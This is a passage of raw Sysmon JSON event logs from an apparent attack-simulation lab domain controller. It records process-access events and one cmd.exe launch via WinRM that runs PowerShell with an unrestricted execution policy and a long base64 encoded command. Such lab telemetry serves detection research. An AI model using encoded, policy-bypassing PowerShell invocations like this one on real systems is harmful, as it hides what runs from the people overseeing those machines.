ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.268","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5532,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.283\r\nProcessGuid: {41C8662E-20D7-5F25-0000-0010ADE40800}\r\nProcessId: 4360\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20D7-5F25-0000-0020ADE10800}\r\nLogonId: 0x8E1AD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-20D7-5F25-0000-0010DBE10800}\r\nParentProcessId: 2124\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.283","ProcessGuid":"{41C8662E-20D7-5F25-0000-0010ADE40800}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20D7-5F25-0000-0020ADE10800}","LogonId":"0x8e1ad","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-20D7-5F25-0000-0010DBE10800}","ParentProcessId":"2124","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5533,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.268\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-0010DBE10800}\r\nSourceProcessId: 2124\r\nSourceThreadId: 4840\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-0010ADE40800}\r\nTargetProcessId: 4360\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.268","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-0010DBE10800}","SourceProcessId":"2124","SourceThreadId":"4840","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-0010ADE40800}","TargetProcessId":"4360","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5534,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-0010ADE40800}\r\nTargetProcessId: 4360\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-0010ADE40800}","TargetProcessId":"4360","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5535,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5536,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5537,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: 